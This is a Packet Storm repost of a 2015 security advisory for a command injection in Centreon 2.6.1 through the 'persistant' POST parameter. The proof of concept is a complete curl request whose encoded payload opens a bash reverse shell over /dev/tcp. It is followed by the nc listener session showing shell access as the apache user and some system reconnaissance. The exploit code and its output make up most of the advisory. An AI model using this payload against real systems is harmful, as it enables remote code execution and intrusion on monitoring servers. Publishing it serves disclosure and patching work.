what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Centreon 2.6.1 Command Injection

Centreon 2.6.1 Command Injection
Posted Sep 28, 2015
Authored by LiquidWorm | Site zeroscience.mk

Centreon version 2.6.1 suffers from a command injection vulnerability. The POST parameter 'persistant' which serves for making a new service run in the background is not properly sanitized before being used to execute commands. This can be exploited to inject and execute arbitrary shell commands as well as using cross site request forgery attacks.

tags | exploit, arbitrary, shell, csrf
SHA-256 | de65336a8a68b4177f682854c6416feedbbf44c0a5ff31835c174e78d0ac4037

Centreon 2.6.1 Command Injection

Change Mirror Download

Centreon 2.6.1 Command Injection Vulnerability


Vendor: Centreon
Product web page: https://www.centreon.com
Affected version: 2.6.1 (CES 3.2)

Summary: Centreon is the choice of some of the world's largest
companies and mission-critical organizations for real-time IT
performance monitoring and diagnostics management.

Desc: The POST parameter 'persistant' which serves for making
a new service run in the background is not properly sanitised
before being used to execute commands. This can be exploited
to inject and execute arbitrary shell commands as well as using
cross-site request forgery attacks.

Tested on: CentOS 6.6 (Final)
Apache/2.2.15
PHP/5.3.3


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience


Advisory ID: ZSL-2015-5265
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5265.php


10.08.2015

--

<<<<<<

root@zslab:~# curl -i -s -k -X 'POST' \
-H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:38.0) Gecko/20100101 Firefox/38.0' \
-H 'Content-Type: application/x-www-form-urlencoded' \
-b 'PHPSESSID=bk80lvka1v8sb9ltuivjngo520' \
--data-binary $'host_id=14&service_id=19&persistant=1%27%22%600%26%2fbin%2fbash+-i+%3e+%2fdev%2ftcp%2f127.0.0.1%2f6161+0%3c%261+2%3e%261%60%27&duration_scale=s&start=08%2f17%2f2018&start_time=8%3a16&end=09%2f17%2f2018&end_time=10%3a16&comment=pwned&submitA=Save&o=as' \
'http://localhost.localdomain/centreon/main.php?p=20218'

>>>>>>

root@zslab:~# nc -4 -l -n 6161 -vv -D
Connection from 127.0.0.1 port 6161 [tcp/*] accepted
bash: no job control in this shell
bash-4.1$ id
id
uid=48(apache) gid=48(apache) groups=48(apache),494(centreon-engine),496(centreon-broker),498(centreon),499(nagios)
bash-4.1$ uname -a;cat /etc/issue
uname -a;cat /etc/issue
Linux localhost.localdomain 2.6.32-504.16.2.el6.x86_64 #1 SMP Wed Apr 22 06:48:29 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux
Centreon Enterprise Server
Kernel \r on an \m

bash-4.1$ pwd
pwd
/usr/share/centreon/www
bash-4.1$ exit
exit
exit
root@zslab:~#
Login or Register to add favorites

File Archive:

February 2023

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Feb 1st
    11 Files
  • 2
    Feb 2nd
    9 Files
  • 3
    Feb 3rd
    5 Files
  • 4
    Feb 4th
    0 Files
  • 5
    Feb 5th
    0 Files
  • 6
    Feb 6th
    0 Files
  • 7
    Feb 7th
    0 Files
  • 8
    Feb 8th
    0 Files
  • 9
    Feb 9th
    0 Files
  • 10
    Feb 10th
    0 Files
  • 11
    Feb 11th
    0 Files
  • 12
    Feb 12th
    0 Files
  • 13
    Feb 13th
    0 Files
  • 14
    Feb 14th
    0 Files
  • 15
    Feb 15th
    0 Files
  • 16
    Feb 16th
    0 Files
  • 17
    Feb 17th
    0 Files
  • 18
    Feb 18th
    0 Files
  • 19
    Feb 19th
    0 Files
  • 20
    Feb 20th
    0 Files
  • 21
    Feb 21st
    0 Files
  • 22
    Feb 22nd
    0 Files
  • 23
    Feb 23rd
    0 Files
  • 24
    Feb 24th
    0 Files
  • 25
    Feb 25th
    0 Files
  • 26
    Feb 26th
    0 Files
  • 27
    Feb 27th
    0 Files
  • 28
    Feb 28th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close